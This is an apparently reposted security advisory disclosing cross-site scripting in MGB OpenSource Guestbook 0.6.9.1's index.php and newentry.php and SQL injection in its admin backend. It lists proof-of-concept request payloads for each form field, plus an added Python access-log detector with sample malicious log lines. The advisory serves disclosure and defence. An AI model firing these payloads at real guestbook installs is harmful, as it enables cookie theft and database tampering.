MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities | BOT24

Advisory: MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-017
Author: Stefan Schurtz
Affected Software: Successfully tested on MGB OpenSource Guestbook 0.6.9.1
Vendor URL:
Vendor Status: informed
======================
Vulnerability Description
======================
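The MGB OpenSource Guestbook is prone to multiple security vulnerabilities: cross-site scripting (XSS) in index.php and newentry.php, and SQL injection in the admin backend (admin/admin.php).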

==============
PoC-Exploit
==============

// XSS

  1. GET
http://[target]/mgb/index.php?p=1'"</script><script>alert(document.cookie)</script>

  2. POST
http://[target]/mgb/newentry.php
sent=1&name='"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city='"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email='"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq='"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim='"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn='"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau

// SQLi (Admin backend)

http://[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
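
A detection check for the two GET vectors above, as an added example that is not part of the original advisory: it flags access-log requests where `p` or `id` is not a plain integer. That these parameters are integers in normal use, the combined log format, and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows being abused, keyed by script path.
# Assumption: each is a plain integer in normal use; adjust the /mgb/ prefix
# to the local install path.
NUMERIC_PARAMS = {
    "/mgb/index.php": ("p",),
    "/mgb/admin/admin.php": ("id", "p"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return (path, param, decoded value) for each non-integer value."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    try:
        url = urlsplit(match.group(1))
    except ValueError:  # malformed request target, e.g. a broken IPv6 literal
        return []
    hits = []
    for name in NUMERIC_PARAMS.get(url.path, ()):
        for value in parse_qs(url.query, keep_blank_values=True).get(name, []):
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((url.path, name, value))
    return hits

# Constructed sample entries (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2012:10:00:01 +0200] "GET /mgb/index.php?p=2 HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.44 - - [08/Jul/2012:10:00:07 +0200] "GET /mgb/index.php?p=1%27%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5300 "-" "-"',
    '192.0.2.44 - - [08/Jul/2012:10:01:12 +0200] "GET /mgb/admin/admin.php?action=delete&id=12abc&p=1 HTTP/1.1" 200 812 "-" "-"',
    '192.0.2.10 - - [08/Jul/2012:10:02:30 +0200] "GET /mgb/admin/admin.php?action=delete&id=12&p=1 HTTP/1.1" 302 0 "-" "-"',
]

def scan(lines):
    """Return every finding from an iterable of access-log lines."""
    return [hit for line in lines for hit in suspicious_params(line)]

if __name__ == "__main__":
    for path, name, value in scan(SAMPLE_LOG):
        print(f"{path}: parameter {name!r} is not an integer: {value!r}")
```

The newentry.php fields travel in the POST body, which standard access logs do not record, so this check covers only the two GET vectors.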

=====
Solution
=====

– 

================
Disclosure Timeline
================

05-Jul-2012 – developer informed
07-Jul-2012 – feedback from developer

====
Credits
====

Vulnerabilities found and advisory written by Stefan Schurtz.

=======
References
=======

http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt



